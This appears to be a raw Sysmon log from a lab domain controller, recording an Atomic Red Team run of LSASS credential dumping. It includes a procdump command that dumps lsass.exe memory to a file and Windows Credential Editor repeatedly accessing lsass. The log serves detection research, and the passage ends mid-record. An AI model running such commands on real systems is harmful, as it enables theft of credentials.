ll+51781 10341000x800000000000000025547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.730{4DB9351A-A33A-60D3-5406-00000000CF01}696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025543Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025542Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.718{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025541Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.671{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=A91F79A4F5BDEF89A44AC00BEF14720B,SHA256=0BC92AF0F2A87855A54D28CB2BC39854CC9FF672A4A203AC06A909BFFB2BD1DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025540Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.656{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F79DF8C633AB64B8F703092628332A7C,SHA256=DF1F85B1C5C45100B65068A4B29D0B548E491052A72B5A2BE4B92A793E8847C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025539Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.624{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B842435ED965443E0CD3B3673F3AF864,SHA256=B501C44BDBAB91CCCF9BFB5E6717A4C74E3F68BC1D63F2CEC5CD27FC4D9D9A4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025538Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.579{4DB9351A-A339-60D3-5106-00000000CF01}6836ATTACKRANGE\AdministratorC:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exeMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2truetrue 534500x800000000000000025537Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.562{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 12241200x800000000000000025536Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-DeleteKey2021-06-23 21:10:18.562{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE 13241300x800000000000000025535Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localT1031,T1050SetValue2021-06-23 21:10:18.562{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\StartDWORD (0x00000004) 534500x800000000000000025534Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.562{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe 13241300x800000000000000025533Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:10:18.562{4DB9351A-9DDB-60D3-0A00-00000000CF01}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WCESERVICE\DeleteFlagDWORD (0x00000001) 23542300x800000000000000025532Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.562{4DB9351A-A339-60D3-5306-00000000CF01}5972NT AUTHORITY\SYSTEMC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exeC:\Windows\Temp\wceaux.dllMD5=A024AF6D8E29527A722CB5DA2F8ECE55,SHA256=F3229244CCC349E3EC843EB6BAD547C559FE52795393E949D45170086108237B,IMPHASH=D34166060112FC82FCC2E4C9358CAADDtruetrue 824800x800000000000000025531Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.531{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe40240x00000277FAAD082C-- 10341000x800000000000000025530Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.531{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025529Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.515{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe34160x00000277FAAD082C-- 10341000x800000000000000025528Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.515{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.499{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe70960x00000277FAAD082C-- 10341000x800000000000000025526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.499{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.484{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe71320x00000277FAAD082C-- 10341000x800000000000000025524Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.484{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025523Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.484{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3BCA8F05DA38905A35C4DE3381B53602,SHA256=88AFBE1163492296A28B44A037CB32385B7FE844954EC6F4AD47A526AF6BBF30,IMPHASH=00000000000000000000000000000000falsetrue 824800x800000000000000025522Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.452{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe47760x00000277FAAD082C-- 10341000x800000000000000025521Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.452{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025520Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.437{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe63400x00000277FAAD082C-- 10341000x800000000000000025519Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.437{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025518Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.421{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe68520x00000277FAAD082C-- 10341000x800000000000000025517Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.421{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.390{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe50040x00000277FAAD082C-- 10341000x800000000000000025515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.374{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.327{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe39120x00000277FAAD082C-- 10341000x800000000000000025513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.327{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.312{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe53280x00000277FAAD082C-- 10341000x800000000000000025511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.296{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.250{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe28720x00000277FAAD082C-- 10341000x800000000000000025509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 